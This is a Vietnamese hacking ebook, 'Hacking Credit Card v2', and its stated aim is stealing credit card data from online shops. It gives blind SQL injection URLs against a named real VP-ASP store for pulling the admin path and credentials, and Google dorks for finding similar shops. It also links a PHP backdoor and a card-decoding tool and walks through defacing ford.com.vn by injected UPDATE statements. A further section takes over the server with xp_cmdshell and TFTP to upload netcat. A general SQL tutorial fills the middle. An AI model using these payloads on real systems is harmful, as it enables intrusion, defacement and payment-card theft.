Upload
ku-nhin-gi
View
70
Download
1
Embed Size (px)
Citation preview
------+++-----
Ebook Hacking Credit Card Version 2 Lastest And The End.
Hack ch l hc hi v trao di k nng bo mt. Title : Credit Card Should Stop
====== Author: hieupc Email: [email protected]: [email protected]: http://thegioiebook.com
=============================
Sau khi hieupc hon thnh phin bn 1, hieupc cng ngh ngay n phin bn 2 ca Ebook Hacking Credit Card. V phin bn Ebook mi ny s hon thin v lp i nhng thiu st tn ti Ebook c.
Tutorial ng ch nht trong Ebook ny. Hacking Credit Card Sql Blind V.1 (Power by Tieuquainho) C mt bi vit nm trong Ebook Hacking Credit Card version 1, c cch hack ging cch ny nhng c v y l bi vit y nht. Xin gii thiu s qua SQL Blind : y l hnh thc khai thc da vo l hng bo mt ca MSSQL, da vo l hng ny chng ta p dng nhng on m khai thc v tm kim c thng tin t Database ca Server . SQL Blind l kiu khai thc d tm tng k t, khi cc bn s dng a s cc thao thc k thut hack SQL khc m khng thnh cng th c th tm ni SQL Blind ny c th khai thng nhng b tc , tuy nhin bn mt tt lun c mt khng tt l qu trnh truy vn SQL Blind tn rt nhiu thi gian v cng sc bi v cc bn phi tm tng k t mt trong chui cn tm . VD: tm link admin th cc bn phi tm tng ch trong chui Database v link admin v ghp chng li thnh 1 chui. Ni nhiu cc bn ri thi lm lin cho chc d hiu. Chun b : - Trnh duyt Web Opera, Mozila Firefor v1.3 hoc loi khc Internet Explorer l ok. Khng nn xi Internet Explorer Hack (^|^) - 1 ly nc v 1 ci khn lau mt cha chy & lau m hi. Mc tiu: - Tt c cc Phin bn t 5.0 tr v trc ca VP-ASP (loi shop tng i nhiu li v nhiu cc cht (^|^)) - Cc Tm nhng Shop VP-ASP ny th c th tham kha nhng t kha bn di dng cho vic search trn Google, Yahoo mt site tm kim bt k no . - T Kha : + shopdisplayproducts.asp?id + shopaddtocart.asp?catalogid= - Ti ch a ra 2 t kha bi v n l nhng mc tiu chnh gip 1 trang tm kim c th tm ra c VP-ASP.
Chng ta bt u hack 1 site demo nha Mc tiu l hxxps://circleathletics.com/ (s dng VP-ASP V5.0) - u tin chng ta tm link admin ca site ny - hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20fieldname%20from%20configuration%20where%20left(fieldname,10)='xadminpage'%20and%20left(fieldvalue,1)='a') Microsoft VBScript runtime error '800a000d' Type mismatch: 'clng' /shop/shopproductfeatures.asp, line 139 Nh vy c ngha l t kha chng ta a ra (a) khng phi l k t u tin trong chui link admin, chng ta cht suy ngh n link admin thng l shopadmin.asp th vi cu lnh sau thay ch a = s - hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20fieldname%20from%20configuration%20where%20left(fieldname,10)='xadminpage'%20and%20left(fieldvalue,1)='s') Microsoft OLE DB Provider for SQL Server error '80040e07' Syntax error converting the varchar value 'xadminpage' to a column of data type int. /shop/shop$db.asp, line 409 - Chnh xc l ch S l k t u tien ca link admin ri, chng ta tip tc th nhng ch khc v tip theo - hxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20fieldname%20from%20configuration%20where%20left(fieldname,10)='xadminpage'%20and%20left(fieldvalue,2)='sh') - Ch ch ny nha (fieldvalue,2)='sh') - C tip tc thay tip vo tm ra link admin. Link admin kt thc = .asp nn khng cn tm xem chui k t c bao nhiu k t u Tip theo chng ta tm user + pass admin hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20fldusername%20from%20tbluser%20where%20admintype='super'%20and%20left(fldusername,1)='a') Microsoft VBScript runtime error '800a000d' Type mismatch: 'clng' /shop/shopproductfeatures.asp, line 139 Ko c g ht tip tc nh th hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20fldusername%20from%20tbluser%20where%20admintype='super'%20and%20left(fldusername,1)='c') Microsoft OLE DB Provider for SQL Server error '80040e07' Syntax error converting the varchar value 'circ54' to a column of data type int. /shop/shop$db.asp, line 409 Hin lun User ra lun site ny b li nng nu nhng site khc cc bn ng no 1 t nh khi tm link admin l ok hihi hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20f
fldpassword='" & userpassword & "'" Set rs = myconn.Execute(SQL) if not rs.eof then CheckSecondpassword rc If rc=0 then GetAdminData rs else closerecordset rs shopclosedatabase myconn msg=Secondpasswordmsg & "" end if else rs.close set rs=nothing LocateSupplier end if if msg="" then msg=LangAdmin01 & "" end if Shopclosedatabase myconn else msg=LangAdmin01 & "" Shopclosedatabase myconn end if end if AdminPageHeader if msg "" Then response.write getconfig("xfont") & msg & "" end if %>
0 then msg="database Open error" & GetSess("Openerror") else If Not rs.EOF Then setsess "shopadmin" ,request("username") setsess "admintype","supplier" setsess "login" , rs("supplieruserid") setsess("supplierid"),rs("supplierid")
rs.close set rs=nothing GetUserTables ' setsess "usertables",rs("tablesallowed") LogUser GetSess("ShopAdmin"), "in", myconn Shopclosedatabase myconn response.redirect "shopadmin1.asp" else rs.close set rs=nothing end if end if end sub Sub GetUserTables dim rs sql = "select * from tbluser where fldusername='supplier'" Set rs = myconn.Execute(SQL) if err.number>0 then msg="database Open error" & GetSess("Openerror") else If Not rs.EOF Then setsess "usertables",rs("tablesallowed") setsess "adminmenus",rs("fldaccess") end if end if rs.close set rs=nothing end sub Sub Checksecurity (ipassword) dim tpassword tpassword=ucase(ipassword) if tpassword="VPASP" or tpassword="ADMIN" then setsess "security","Yes" end if end sub '******************************************************************* ' if using second password facility, the validate it '******************************************************************* Sub CheckSecondPassword(rc) dim password rc=4 If secondpassword="" then rc=0 exit sub end if password=request.form("password2") if password="" then exit sub if ucase(password)ucase(secondpassword) then exit sub rc=0 end sub
ordertracking prodcategories prodfeatures products projects quantitydiscounts registrant registryitems reviews searchresults shipmethods pass_access suppliers tblaccess tbllog tbluser CHECK_CONSTRAINTS COLUMN_DOMAIN_USAGE COLUMN_PRIVILEGES COLUMNS CONSTRAINT_COLUMN_USAGE CONSTRAINT_TABLE_USAGE DOMAIN_CONSTRAINTS DOMAINS KEY_COLUMN_USAGE REFERENTIAL_CONSTRAINTS
SCHEMATA TABLE_CONSTRAINTS TABLE_PRIVILEGES TABLES VIEW_COLUMN_USAGE VIEW_TABLE_USAGE VIEWS V cch tm kim ny tn rt nhiu cng sc, v phi tm y cc table ca n, m vi kiu hack hin nay th l on m table, hoc blind tng k t ca table .Ngi c ngy cha chc ra 1 shop. Tuy nhin n nay nobita cng cha tm c gii php no tt hn cho loi ny . Mong rng qua bi vit ny s gip anh em tm kim pass2 c tt hn . Bi vit ca hieupc: Theo kinh nghim ca hieupc bit c, mun hack c password th 2 ca shop ( Secure Pass) th ch c cch hack local l nhanh v gn nht, ngoi cch hack local ny bn c th da theo bi vit kinh nghim ca nobita m ly c pass 2. C v vic hack local tr nn rt d khi bn c mt host trong tay, v ch cn upload 1 con backdoor ln chng hn nh con remview.php l c th hack. Tuy nhin vic ny i hi bn phi c kin thc vng v Hosting v DNS. Bn mun bit c shop nm server no bn c th check DNS hoc IP nh v, v t bn ln theo m ng k cho mnh 1 host cng host vi shop bn cn ly pass 2. Cn vic hack local v check DNS th no hay hiu r thm v host cc bn c th gh thm cc trang sau y c hng dn c th: http://viethacker.org , http://hvaonline.net v check DNS, kim tra thng tin bn: http://pavietnam.net , http://checkdomain.com , http://whoisc.com , http://check-dns.com . Ngoi ra, cn nhiu trang web khc, bn c th ln google.com search. Remview.php : http://php.spb.ru/remview/remview_2003_10_23.zip Ngoi ra cn nhiu Mshell, Backdoor khc c th kim trn google.com hoc qua trang http://viethacker.org Decode CC b m ha: http://rapidshare.de/files/8343810/decodecc.rar.html (pass unrar : thegioiebook.com )
Nhng bi cn phi c nm vng kin thc Hacking Credit Card.
- Gii thiu v SQL.
Ngun t diendantinhoc.net
~~~~~~~~~~~~~~~~~~~~~~~
SQL l chun ngn ng ANSI truy cp CSDL.
SQL l g?
SQL l vit tt ca Structured Query Language - Ngn ng truy vn cu trc.
SQL cho php bn truy cp vo CSDL.
SQL l mt chun ngn ng ca ANSI.
SQL c th thc thi cc cu truy vn trn CSDL.
SQL c th ly d liu t CSDL.
SQL c th chn d liu mi vo CSDL.
SQL c th xo d liu trong CSDL.
SQL c th sa i d liu hin c trong CSDL.
SQL d hc :-)
SQL l mt chun
SQL l mt chun ca ANSI (American National Standards Institute - Vin tiu chun
quc gia Hoa k) v truy xut cc h thng CSDL. Cc cu lnh SQL c s dng
truy xut v cp nht d liu trong mt CSDL.
SQL hot ng vi hu ht cc chng trnh CSDL nh MS Access, DB2, Informix, MS
SQL Server, Oracle, Sybase v.v...
Lu : Hu ht cc chng trnh CSDL h tr SQL u c phn m rng cho SQL ch
hot ng vi chnh chng trnh .
Bng CSDL
Mt CSDL thng bao gm mt hoc nhiu bng (table). Mi bng c xc nh thng
qua mt tn (v d Customers hoc Orders). Bng cha cc mu tin - dng (record - row),
l d liu ca bng.
Di y l mt v d v mt bng c tn l Persons (ngi):
LastName FirstName Address City
Hansen Ola Timoteivn 10 Sandnes
Svendson Tove Borgvn 23 Sandnes
Pettersen Kari Storgt 20 Stavanger
Bng trn bao gm 3 mu tin (dng), mi mu tin tng ng vi mt ngi, v bn ct
(LastName, FirstName, Address v City).
Cu truy vn SQL
Vi SQL ta c th truy vn CSDL v nhn ly kt qu tr v thng qua cc cu truy vn.
Mt cu truy vn nh sau:
SELECT LastName FROM Persons
S tr v kt qu nh sau:
LastName
Hansen
Svendson
Pettersen
Lu : Mt s h thng CSDL i hi cu lnh SQL phi kt thc bng mt du chm
phy (;). Chng ta s khng dng du chm phy trong bi vit ny.
SQL l ngn ng thao tc d liu (DML - Data Manipulation Language)
SQL l c php thc thi cc cu truy vn. SQL cng bao gm c php cp nht -
sa i, chn thm v xo cc mu tin.
Sau y l danh sch cc lnh v truy vn dng DML ca SQL:
SELECT - ly d liu t mt bng CSDL.
UPDATE - cp nht/sa i d liu trong bng.
DELETE - xo d liu trong bng.
INSERT INTO - thm d liu mi vo bng.
SQL l ngn ng nh ngha d liu (DDL - Data Definition Language)
Phn DDL ca SQL cho php to ra hoc xo cc bng. Chng ta cng c th nh ngha
cc kho (key), ch mc (index), ch nh cc lin kt gia cc bng v thit lp cc quan
h rng buc gia cc bng trong CSDL.
Cc lnh DDL quan trng nht ca SQL l:
CREATE TABLE - to ra mt bng mi.
ALTER TABLE - thay i cu trc ca bng.
DROP TABLE - xo mt bng.
CREATE INDEX - to ch mc (kho tm kim - search key).
DROP INDEX - xo ch mc c to.
-Cu lnh SELECT
Cu lnh SELECT c dng truy xut d liu t mt bng. Kt qu tr v di dng
bng c lu trong 1 bng, gi l bng kt qu - result table (cn c gi l tp kt qu
- result set).
C php
C php ca cu lnh SELECT nh sau:
SELECT tn_cc_ct
FROM tn_bng
Truy xut nhiu ct
truy xut cc ct mang tn LastName v FirstName, ta dng mt cu lnh SELECT
nh sau:
SELECT LastName, FirstName FROM Persons
Bng Persons:
LastName FirstName Address City
Hansen Ola Timoteivn 10 Sandnes
Svendson Tove Borgvn 23 Sandnes
Pettersen Kari Storgt 20 Stavanger
Kt qu tr v:
LastName FirstName
Hansen Ola
Svendson Tove
Pettersen Kari
Truy xut tt c cc ct
truy xut tt c cc ct t bng Persons, ta dng k hiu * thay cho danh sch cc ct:
SELECT * FROM Persons
Kt qu tr v:
LastName - FirstName- Address -City
Hansen - Ola -Timoteivn 10 - Sandnes
Svendson - Tove -Borgvn 23 - Sandnes
Pettersen -Kari -Storgt 20 -Stavanger
Tp kt qu
Kt qu tr v t mt cu truy vn SQL c lu trong 1 tp kt qu (result set). Hu ht
cc h thng chng trnh CSDL cho php duyt qua tp kt qu bng cc hm lp trnh
nh Move-To-First-Record, Get-Record-Content, Move-To-Next-Record v.v...
Du chm phy (;) pha sau cu lnh
Du chm phy l mt cch chun phn cch cc cu lnh SQL nu nh h thng
CSDL cho php nhiu cu lnh SQL c thc thi thng qua mt li gi duy nht.
Cc cu lnh SQL trong bi vit ny u l cc cu lnh n (mi cu lnh l mt v ch
mt lnh SQL). MS Access v MS SQL Server khng i hi phi c du chm phy
ngay sau mi cu lnh SQL, nhng mt s chng trnh CSDL khc c th bt buc bn
phi thm du chm phy sau mi cu lnh SQL (cho d l cu lnh n). Xin nhc
li, trong bi vit ny chng ta s khng dng du chm phy cui cu lnh SQL.
-Mnh WHERE
truy xut d liu trong bng theo cc iu kin no , mt mnh WHERE c th
c thm vo cu lnh SELECT.
C php
C php mnh WHERE trong cu lnh SELECT nh sau:
SELECT tn_ct FROM tn_bng
WHERE tn_ct php_ton gi_tr
Trong mnh WHERE, cc php ton c s dng l
Php ton M t
= So snh bng
So snh khng bng
> Ln hn
< Nh hn
>= Ln hn hoc bng
hin th mt dng nu BT K iu kin no c tho.
Bng d liu dng trong v d
LastName FirstName Address City
Hansen Ola Timoteivn 10 Sandnes
Svendson Tove Borgvn 23 Sandnes
Svendson Stephen Kaivn 18 Sandnes
V d 1
S dng AND tm nhng ngi c tn l Tove v h l Svendson:
SELECT * FROM Persons
WHERE FirstName = 'Tove'
AND LastName = 'Svendson'
Kt qu tr v:
LastName FirstName Address City
Svendson Tove Borgvn 23 Sandnes
V d 2
S dng OR tm nhng ngi c tn l Tove hoc h l Svendson:
SELECT * FROM Persons
WHERE firstname = 'Tove'
OR lastname = 'Svendson'
Kt qu tr v:
LastName FirstName Address City
Svendson Tove Borgvn 23 Sandnes
Svendson Stephen Kaivn 18 Sandnes
V d 3
Bn cng c th s dng kt hp AND v OR cng vi du ngoc n to nn cc cu
truy vn phc tp:
SELECT * FROM Persons WHERE
(FirstName = 'Tove' OR FirstName = 'Stephen')
AND LastName = 'Svendson'
Kt qu tr v:
LastName FirstName Address City
Svendson Tove Borgvn 23 Sandnes
Svendson Stephen Kaivn 18 Sandnes
Hansen Ola Timoteivn 10 Sandnes 1951
Svendson Tove Borgvn 23 Sandnes 1978
Svendson Stale Kaivn 18 Sandnes 1980
Pettersen Kari Storgt 20 Stavanger 1960
Kt qu tr v:
LastName FirstName Address City Year
Hansen Ola Timoteivn 10 Sandnes 1951
Svendson Tove Borgvn 23 Sandnes 1978
Svendson Stale Kaivn 18 Sandnes 1980
S dng du nhy
Lu rng v d trn ta s dng hai du nhy n (') bao quanh gi tr iu kin
'Sandnes'.
SQL s dng du nhy n bao quanh cc gi tr dng chui vn bn (text). Nhiu h
CSDL cn cho php s dng du nhy kp ("). Cc gi tr dng s khng dng du
nhy bao quanh.
Vi d liu dng chui vn bn:
Cu lnh ng:
SELECT * FROM Persons WHERE FirstName = 'Tove'
Cu lnh sai:
SELECT * FROM Persons WHERE FirstName = Tove
Vi d liu dng s:
Cu lnh ng:
SELECT * FROM Persons WHERE Year > 1965
Cu lnh sai:
SELECT * FROM Persons WHERE Year > '1965'
Php ton iu kin LIKE
Php ton LIKE c dng tm kim mt chui mu vn bn trn mt ct.
C php
C php ca php ton LIKE nh sau:
SELECT tn_ct FROM tn_bng
WHERE tn_ct LIKE mu
Mt k hiu % c th c s dng nh ngha cc k t i din. % c th c t
trc v/hoc sau mu.
S dng LIKE
Cu lnh SQL sau s tr v danh sch nhng ngi c tn bt u bng ch O:
SELECT * FROM Persons
WHERE FirstName LIKE 'O%'
Cu lnh SQL sau s tr v danh sch nhng ngi c tn kt thc bng ch a:
SELECT * FROM Persons
WHERE FirstName LIKE '%a'
Cu lnh SQL sau s tr v danh sch nhng ngi c tn kt cha chui la:
SELECT * FROM Persons
WHERE FirstName LIKE '%la%'
Ton t BETWEEN...AND
ly ra mt min d liu nm gia hai gi tr. Hai gi tr ny c th l s, chui vn bn
hoc ngy thng.
SELECT tn_ct FROM tn_bng
WHERE tn_ct
BETWEEN gi_tr_1 AND gi_tr_2
Bng d liu dng trong v d
LastName FirstName Address City
Hansen Ola Timoteivn 10 Sandnes
Nordmann Anna Neset 18 Sandnes
Pettersen Kari Storgt 20 Stavanger
Svendson Tove Borgvn 23 Sandnes
V d 1
Tm tt c nhng ngi c h (sp xp theo ABC) nm gia Hansen (tnh lun Hansen)
v Pettersen (khng tnh Pettersen):
SELECT * FROM Persons WHERE LastName
BETWEEN 'Hansen' AND 'Pettersen'
Kt qu tr v:
LastName FirstName Address City
Hansen Ola Timoteivn 10 Sandnes
Nordmann Anna Neset 18 Sandnes
Lu quan trng: Ton t BETWEEN...END s tr v nhng kt qu khc nhau trn cc
h CSDL khc nhau. Vi mt s h CSDL, ton t BETWEEN...END s tr v cc dng
m c gi tr thc s "nm gia" hai khong gi tr (tc l b qua khng tnh n cc gi
tr trng vi gi tr ca hai u mt). Mt s h CSDL th s tnh lun cc gi tr trng vi
hai u mt. Trong khi mt s h CSDL khc li ch tnh cc gi tr trng vi u mt
th nht m khng tnh u mt th hai (nh v d pha trn). Do vy, bn phi kim
tra li h CSDL m bn ang dng khi s dng ton t BETWEEN...AND.
V d 2
tm nhng ngi c h (sp xp theo ABC) nm ngoi khong hai gi tr v d 1, ta
dng thm ton t NOT:
SELECT * FROM Persons WHERE LastName
NOT BETWEEN 'Hansen' AND 'Pettersen'
Kt qu tr v:
LastName FirstName Address City
Pettersen Kari Storgt 20 Stavanger
Svendson Tove Borgvn 23 Sandnes
-------------------------------
T kho DISTINCT
Cu lnh SELECT s tr v thng tin v cc ct trong bng. Nhng nu chng ta khng
mun ly v cc gi tr trng nhau th sau?
Vi SQL, ta ch cn thm t kho DISTINCT vo cu lnh SELECT theo c php sau:
SELECT DISTINCT tn_ct FROM tn_bng
V d: Tm tt c cc cng ty trong bng t hng
Bng t hng ca ta nh sau:
Company OrderNumber
Sega 3412
W3Schools 2312
Trio 4678
W3Schools 6798
Cu lnh SQL sau:
SELECT Company FROM Orders
S tr v kt qu:
Company
Sega
W3Schools
Trio
W3Schools
Tn cng ty W3Schools xut hin hai ln trong kt qu, i khi y l iu chng ta
khng mun.
V d: Tm tt c cc cng ty khc nhau trong bng t hng
Cu lnh SQL sau:
SELECT DISTINCT Company FROM Orders
S tr v kt qu:
Company
Sega
W3Schools
Trio
Tn cng ty W3Schools by gi ch xut hin 1 ln, i khi y l iu chng ta mong
mun
--------------------------------
T kho ORDER BY c s dng sp xp kt qu tr v.
Sp xp cc dng
Mnh ORDER BY
c dng sp xp cc dng.
V d bng Orders:
Company OrderNumber
Sega 3412
ABC Shop 5678
W3Schools 2312
W3Schools 6798
V d:
ly danh sch cc cng ty theo th t ch ci (tng dn):
SELECT Company, OrderNumber FROM Orders
ORDER BY Company
Kt qu tr v:
Company OrderNumber
ABC Shop 5678
Sega 3412
W3Schools 6798
W3Schools 2312
V d:
Ly danh sch cc cng ty theo th t ch ci (tng dn) v ho n t hng theo th t
s tng dn:
SELECT Company, OrderNumber FROM Orders
ORDER BY Company, OrderNumber
Kt qu tr v:
Company OrderNumber
ABC Shop 5678
Sega 3412
W3Schools 2312
W3Schools 6798
V d:
Ly danh sch cc cng ty theo th t gim dn:
SELECT Company, OrderNumber FROM Orders
ORDER BY Company DESC
Kt qu tr v:
Company OrderNumber
W3Schools 6798
W3Schools 2312
Sega 3412
ABC Shop 5678
Cu lnh INSERT INTO
Cu lnh INSERT INTO c dng chn dng mi vo bng.
C php:
INSERT INTO tn_bng
VALUES (gi_tr_1, gi_tr_2,....)
Bn cng c th ch r cc ct/trng no cn chn d liu:
INSERT INTO tn_bng (ct_1, ct_2,...)
VALUES (gi_tr_1, gi_tr_2,....)
Chn 1 dng mi
Ta c bng Persons nh sau:
LastName FirstName Address City
Pettersen Kari Storgt 20 Stavanger
Cu lnh SQL sau:
INSERT INTO Persons
VALUES ('Hetland', 'Camilla', 'Hagabakka 24', 'Sandnes')
s tora kt qu trong bng Persons nh sau:
LastName FirstName Address City
Pettersen Kari Storgt 20 Stavanger
Hetland Camilla Hagabakka 24 Stavanger
Chn d liu vo cc ct/trng c th
Vi bng Persons nh trn, cu lnh SQL sau:
INSERT INTO Persons (LastName, Address)
VALUES ('Rasmussen', 'Storgt 67')
S to ra kt qu:
LastName FirstName Address City
Pettersen Kari Storgt 20 Stavanger
Hetland Camilla Hagabakka 24 Stavanger
Rasmussen Storgt 67
--------------------------
Cu lnh UPDATE
Cu lnh UPDATE c s dng cp nht/sa i d liu c trong bng.
C php:
UPDATE tn_bng
SET tn_ct = gi_tr_mi
WHERE tn_ct = gi_tr
V d: bng Person ca ta nh sau:
LastName FirstName Address City
Nilsen Fred Kirkegt 56 Stavanger
Rasmussen Storgt 67
Cp nht 1 ct trn 1 dng
Gi s ta mun b xung thm phn tn cho ngi c h l Rasmussen:
UPDATE Person SET FirstName = 'Nina'
WHERE LastName = 'Rasmussen'
Ta s c kt qu nh sau:
LastName FirstName Address City
Nilsen Fred Kirkegt 56 Stavanger
Rasmussen Nina Storgt 67
Cp nht nhiu ct trn 1 dng
By gi ta li mun i tn v a ch:
UPDATE Person
SET Address = 'Stien 12', City = 'Stavanger'
WHERE LastName = 'Rasmussen'
Kt qu s l:
LastName FirstName Address City
Nilsen Fred Kirkegt 56 Stavanger
Rasmussen Nina Stien 12 Stavanger
-------------------------
Cu lnh DELETE
c dng xo cc dng ra khi bng.
C php:
DELETE FROM tn_bng
WHERE tn_ct = gi_tr
V d: Bng Person ca ta nh sau:
LastName FirstName Address City
Nilsen Fred Kirkegt 56 Stavanger
Rasmussen Nina Stien 12 Stavanger
Xo 1 dng:
Ta xo ngi c tn l Nina Rasmussen:
DELETE FROM Person WHERE LastName = 'Rasmussen'
Kt qu sau khi xo:
LastName FirstName Address City
Nilsen Fred Kirkegt 56 Stavanger
Xo tt c cc dng:
i khi ta mun xo tt c d liu trong bng nhng vn gi li bng cng vi cu trc
v tt c cc thuc tnh ca bng, ta c th dng cu lnh:
DELETE FROM table_name
hoc
DELETE * FROM table_name
SQL c sn lnh m cc dng trong CSDL.
C php ca hm COUNT:
SELECT COUNT(tn_ct) FROM tn_bng
Hm COUNT(*):
Hm COUNT(*) tr v s lng cc dng c chn trong bng.
V d ta c bng Persons nh sau:
Name Age
Hansen, Ola 34
Svendson, Tove 45
Pettersen, Kari 19
Cu lnh sau s tr v s lng cc dng trong bng:
SELECT COUNT(*) FROM Persons
v kt qu tr v s l:
3
Cu lnh sau s tr v s lng nhng ngi ln hn 20 tui:
SELECT COUNT(*) FROM Persons WHERE Age > 20
kt qu tr v s l:
2
Hm COUNT(column):
Hm COUNT(column) s tr v s lng cc dng c gi tr khc NULL ct c ch
nh.
V d ta c bng Persons nh sau:
Name Age
Hansen, Ola 34
Svendson, Tove 45
Pettersen, Kari
Cu lnh sau s tr v s lng nhng ngi m ct Age trong bng khng rng:
SELECT COUNT(Age) FROM Persons
v kt qu tr v s l:
2
Mnh COUNT DISTINCT
Lu : Cc v d di y ch hot ng vi CSDL Oracle v MS SQL Server, khng
hot ng trn MS Access (cha th nhim vi cc h CSDL khc!)
T kho DISTINCT v COUNT c th c dng chung vi nhau m s lng cc
kt qu khng trng nhau.
C php nh sau:
SELECT COUNT(DISTINCT column(s)) FROM table
V d ta c bng Orders nh sau:
Company OrderNumber
Sega 3412
W3Schools 2312
Trio 4678
W3Schools 6798
Cu lnh SQL sau:
SELECT COUNT(DISTINCT Company) FROM Orders
s tr v kt qu l:
3
SQL nng cao
Hm
SQL c sn kh nhiu hm thc hin m v tnh ton.
C php:
C php gi hm trong cu lnh SQL nh sau:
SELECT function(tn_ct) FROM tn_bng
Bng d liu chng ta s dng trong cc v s tip theo:
Name Age
Hansen, Ola 34
Svendson, Tove 45
Pettersen, Kari 19
Hm AVG(column)
Hm AVG tr v gi tr trung bnh tnh theo ct c ch nh ca cc dng c chn.
Cc gi tr NULL s khng c xt n khi tnh gi tr trung bnh.
V d:
Cu lnh sau s tnh s tui trung bnh ca nhng ngi c tui trn 20:
SELECT AVG(Age) FROM Persons WHERE Age > 20
kt qu tr v s l:
39.5
Hm MAX(column)
Hm MAX tr v gi tr ln nht trong ct. Cc gi tr NULL s khng c xt n.
V d:
SELECT MAX(Age) FROM Persons
kt qu tr v:
45
Hm MIN(column)
Hm MAX tr v gi tr nh nht trong ct. Cc gi tr NULL s khng c xt n.
V d:
SELECT MIN(Age) FROM Persons
kt qu tr v:
19
Lu : Hm MIN v MAX cng c th p dng cho cc ct c d liu l chui vn bn.
D liu trong ct s c so snh theo th t tng dn ca t in
Hm SUM(column)
Hm SUM tr v tng gi tr ca ct. Cc gi tr NULL s khng c xt n.
V d:
Tm tng s tui ca tt c nhng ngi c trong bng:
SELECT SUM(Age) FROM Persons
kt qu tr v:
98
V d:
Tm tng s tui ca tt c nhng ngi c tui ln hn 20:
SELECT SUM(Age) FROM Persons WHERE Age > 20
kt qu tr v:
79
GROUP BY v HAVING
Cc hm tp hp (v d nh SUM) thng thng cn thm chc nng ca mnh
GROUP BY.
GROUP BY...
Mnh GROUP BY...c thm vo SQL bi v cc hm tp hp (nh SUM) tr v
mt tp hp ca cc gi tr trong ct mi khi chng c gi, v nu khng c GROUP
BY ta khng th no tnh c tng ca cc gi tr theo tng nhm ring l trong ct.
C php ca GROUP BY nh sau:
SELECT tn_ct, SUM(tn_ct) FROM tn_bng GROUP BY tn_ct
V d s dng GROUP BY:
Gi s ta c bng Sales nh sau:
Company Amount
W3Schools 5500
IBM 4500
W3Schools 7100
Cu lnh SQL sau:
SELECT Company, SUM(Amount) FROM Sales
s tr v kt qu:
Company SUM(Amount)
W3Schools 17100
IBM 17100
W3Schools 17100
Kt qu tr v trn i khi khng phi l ci m ta mong i. Ta thm mnh
GROUP BY vo trong cu lnh SQL:
SELECT Company, SUM(Amount) FROM Sales
GROUP BY Company
v kt qu tr v ln ny s l:
Company SUM(Amount)
W3Schools 12600
IBM 4500
Kt qu ny ng l ci m ta mong mun.
HAVING...
Mnh HAVING...c thm vo SQL v mnh WHERE khng p dng c i
vi cc hm tp hp (nh SUM). Nu khng c HAVING, ta khng th no kim tra
c iu kin vi cc hm tp hp.
C php ca HAVING nh sau:
SELECT tn_ct, SUM(tn_ct) FROM tn_bng
GROUP BY tn_ct
HAVING SUM(tn_ct) iu_kin gi_tr
Ta s dng li bng Sales trn. Cu lnh SQL sau:
SELECT Company, SUM(Amount) FROM Sales
GROUP BY Company
HAVING SUM(Amount) > 10000
s tr v kt qu:
Company SUM(Amount)
W3Schools 12600
B danh
Vi SQL, b danh c th c s dng cho tn ca ct v tn ca bng.
B danh ct:
C php b danh ct nh sau:
SELECT tn_ct AS b_danh_ct FROM tn_bng
B danh bng:
B danh bng c c php nh sau:
SELECT tn_ct FROM tn_bng AS b_danh_bng
V d s dng b danh ct:
Ta c bng Persons nh sau:
LastName FirstName Address City
Hansen Ola Timoteivn 10 Sandnes
Svendson Tove Borgvn 23 Sandnes
Pettersen Kari Storgt 20 Stavanger
Cu lnh SQL sau:
SELECT LastName AS H, FirstName AS Tn
FROM Persons
S tr v kt qu:
H Tn
Hansen Ola
Svendson Tove
Pettersen Kari
DeFace bng SQL injection, C bn
(by sinhcv)
FOR NEWBIE Hihi em xin tip tc,bi ny vn l c bn cho newbie,cn cao siu hn th em chu. y em xin mn php ly thng Ford ra lm victim.Mc ch ca bi ny l s dng cc cu lnh update,insert ,drop,delete... trong SQL deFace. To 1 file c ni dung nh sau: TIM KIEM DIA DIEM JOB Save as li thnh file xx.html,sau run nh sau TIM KIEM: xxx DIA DIEM: 22 JOB: 1' SQL command -- Trong database ca n c table Fordvn_news vi cc column MessageId','Status','Priority','Subject','Lead', 'Img','Posted','Edited','Published','FromIp','Body','ReadCount' Tng ng vi trang news ca n https://www.ford.com.vn/News/News.asp y em xin chn ci subject deface vi messageid=146 Roi: y l cc cu lnh cn bit Insert into user ("id","pas") values (1,"xxx")-- /*thm 1 user xxx vo table user */ update user set pass="xxxx" where id=1-- /thay i pasword ca thng user c id=1 */ drop table user-- /*nguy him,xa table user */ drop database db-- /*rt nguy him/ delete from user where id=1-- /*xa column */ .............. y em dng update QUOTE TIM KIEM: xxx DIA DIEM: 22
JOB: 1' ;update fordvn_news set subject='TEST' where messageid=146-- Nu bn nhn dc 1 thng bo nh th ny thay v 1 thng bo li SQL th thnh cng ri QUOTE Khng tm c theo yu cu ca bn!
OK come on
https://www.ford.com.vn/News/News.asp
Bn cn c th lm dc nhiu th hn ti na,y ch l VD thoai.
Good luck !!!
Hack server b SQL Injection
( Copyright by Windak )
( --Thanks bro Aclatinh and bro MRRO-- )
1)T l thnh cng 80%:
iu kin server phi l winnt v user dng inject l user c quyn dng xp_cmdshell (sa, dbo)
check bn c th lm sau y trn inject link
[injection link] %2b convert (int,(system_user())
Nu KQ l sa hoc dbo c l bn c th tn cng c ri.
Nu bn c sa hoc dbo nhng m admin li khng cho s dng cmdshell bn hy bt n ln (bt th no t tm hiu nh )
Lu : bn s ch hack c vo server cha database ca n thi (nhiu khi t database chung vi host )
Cc tool cn thit :
tftpd32 , backdoor
+++Mt vi kinh nghim hack, bit lnh DOS v mt cht hiu bit v network
2) Tng bc tip cn
a)Cc khi nim:
Lu : Cch hack ny ca ti khng phi l mt chung nht, bi v cn rt nhiu cch khc, cch ny ca ti hack thng qua giao thc TFTP.
Ni s v giao thc TFTP :
l mt giao thc truyn file serverclient . N hot ng tng t nh FTP nhng n gin hn nhiu , thng qua port 69, v mt u im, n khng cn password (y l iu quan trng ta hack)
Vo DOS g tftp /? -> Bn s c c php ca n nh sau :
TFTP [-i] host PUT || GET filename [v tr file mun gi n]
-i : nu bn cn truyn mt file dng binary hy s dng n
host : IP ca my server
PUT : nu bn mun send file
GET : nu bn mun ly file
V d v mt lnh tftp :
Tftp i xxx.xxx.xxx.xxx PUT netcat.exe C:\nc.exe
S ly file netcat.exe trn my server (my c IP xxx.) v chuyn vo C:\nc.exe trn my client (my g lnh trn)
